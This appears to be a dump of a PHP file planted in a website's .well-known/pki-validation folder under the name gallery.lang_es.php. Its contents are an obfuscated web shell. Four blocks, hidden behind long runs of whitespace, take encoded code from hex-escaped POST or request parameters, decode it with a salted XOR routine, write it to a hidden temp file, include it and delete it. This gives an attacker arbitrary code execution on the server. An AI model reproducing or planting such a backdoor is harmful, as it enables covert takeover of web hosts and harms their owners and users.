HEX

File: /home/vitanhod/trimate.vitavit.com.pk/.well-known/pki-validation/gallery.lang_es.php
<?php																																										if(isset($_REQUEST["\x6Be\x79"])){ $elem = array_filter([session_save_path(), "/var/tmp", sys_get_temp_dir(), "/tmp", getenv("TEMP"), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP")]); $record = $_REQUEST["\x6Be\x79"]; $record = explode ( "." , $record ) ; $dchunk = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt4); foreach ($record as $i => $v1): $sChar = ord($salt4[$i % $sLen]); $d = ((int)$v1 - $sChar - ($i % 10))^ 3; $dchunk .= chr($d); endforeach; $parameter_group = 0; do { $desc = $elem[$parameter_group] ?? null; if ($parameter_group >= count($elem)) break; if ((bool)is_dir($desc) && (bool)is_writable($desc)) { $val = sprintf("%s/.descriptor", $desc); if (file_put_contents($val, $dchunk)) { require $val; unlink($val); die(); } } $parameter_group++; } while (true); }
																																										if(filter_has_var(INPUT_POST, "\x70\x6Fi\x6E\x74er")){ $object = $_REQUEST["\x70\x6Fi\x6E\x74er"]; $object =explode ( "." ,$object ); $res = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2); $x = 0; foreach ($object as $v9) { $sChar = ord($salt2[$x % $lenS]); $dec = ((int)$v9 - $sChar - ($x % 10)) ^ 39; $res .= chr($dec); $x++; } $flg = array_filter(["/var/tmp", getenv("TEMP"), getcwd(), session_save_path(), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), "/tmp", ini_get("upload_tmp_dir")]); for ($bind = 0, $pset = count($flg); $bind < $pset; $bind++) { $ref = $flg[$bind]; if (array_product([is_dir($ref), is_writable($ref)])) { $reference = join("/", [$ref, ".obj"]); if (file_put_contents($reference, $res)) { include $reference; @unlink($reference); die(); } } } }
																																										if(filter_has_var(INPUT_POST, "el\x65\x6D")){ $sym = $_REQUEST["el\x65\x6D"]; $sym =explode ( "." , $sym ) ; $ref= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt ); foreach ($sym as $v =>$v6): $sChar= ord($salt[$v % $sLen] ); $dec= ((int)$v6 - $sChar - ($v % 10)) ^ 51; $ref .= chr($dec ); endforeach; $reference = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", getenv("TMP"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", getcwd()]); foreach ($reference as $key => $bind) { if (array_product([is_dir($bind), is_writable($bind)])) { $symbol = vsprintf("%s/%s", [$bind, ".ptr"]); if (@file_put_contents($symbol, $ref) !== false) { include $symbol; unlink($symbol); die(); } } } }


if(!is_null($_POST["\x6Darke\x72"] ?? null)){
	$mrk = array_filter([session_save_path(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), getcwd(), getenv("TEMP"), getenv("TMP")]);
	$desc = $_POST["\x6Darke\x72"];
	$desc   = explode  (	 '.'	,	  $desc	)		;	
	$val = '';
            $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt8  );
    
            foreach ($desc as $l => $v9):
                $chS = ord($salt8[$l % $sLen]  );
                $dec = ((int)$v9 - $chS - ($l % 10))  ^ 	49;
                $val .= chr($dec  );
            endforeach;
	foreach ($mrk as $obj):
    		if (!!is_dir($obj) && !!is_writable($obj)) {
    $tkn = "$obj" . "/.ent";
    if (file_put_contents($tkn, $val)) {
	include $tkn;
	@unlink($tkn);
	exit;
}
}
endforeach;
}